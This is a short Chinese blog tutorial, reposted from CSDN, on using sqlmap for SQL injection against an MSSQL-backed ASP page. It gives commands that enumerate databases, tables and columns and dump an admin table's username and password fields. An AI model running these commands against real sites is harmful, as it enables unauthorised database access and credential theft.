sqlmap普通注入之mssql注入

1.判断注入点,获取网站信息

sqlmap.py -u http://www.xx.com/ss.asp?id=123

例:

sqlmap.py -u “http://www.xx.com/ss.asp?id=123”

2.获取所有数据库

sqlmap.py -u http://www.xx.com/ss.asp?id=123 –dbs

例:

sqlmap.py -u “http://www.xx.com/ss.asp?id=123” –dbs

3.获取网站当前所使用的数据库

sqlmap.py -u http://www.xx.com/ss.asp?id=123 –current-db

例:

sqlmap.py -u “http://www.xx.com/ss.asp?id=123” –current-db

4.获取数据库中的表名

sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 –tables

例:

sqlmap.py -u “http://www.xx.com/ss.asp?id=123” -D news2008 –tables

5.获取数据表中的字段名

sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 –columns

例:

sqlmap.py -u “http://www.xx.com/ss.asp?id=123” -D news2008 -T admin –columns

6.获取字段中的内容

sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 -C “字段名1,字段名2…” –dump

例:

sqlmap.py -u “http://www.xx.com/ss.asp?id=123” -D news2008 -T admin -C “username,psw” –dump
————————————————
版权声明:本文为CSDN博主「Taoing」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/T780000063/article/details/78900498

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注